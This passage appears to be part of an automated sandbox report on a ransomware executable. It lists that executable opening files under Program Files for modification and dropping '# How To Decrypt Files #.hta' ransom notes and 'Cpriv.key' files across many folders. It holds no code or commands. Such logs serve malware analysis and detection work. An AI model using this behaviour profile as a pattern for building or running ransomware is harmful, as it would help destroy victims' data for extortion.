de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\WATERMAR.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\pkeyconfig-office.xrm-ms de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01394_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212751.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\CHICAGO.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15172_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200183.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FORMCTL.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Install\{790FB95E-131F-4B1A-93CD-438F382AB794}\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18255_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02265_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105288.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297727.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199483.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15155_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\PAWPRINT.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.CNT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Adobe.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103262.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18212_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OLKIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExecutiveResume.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\PABR.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSTORYVERT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\vi.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00046_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00416_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\AccessWeb\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\CONVERT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00234_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Genko_1.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107024.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\DataServices\FOLDER.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR00.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mousedown.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\720x480icongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\bg.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02085_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABELHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18185_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\1100.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR3B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN102.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222017.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\AXIS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Composite.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN089.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Triedit\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 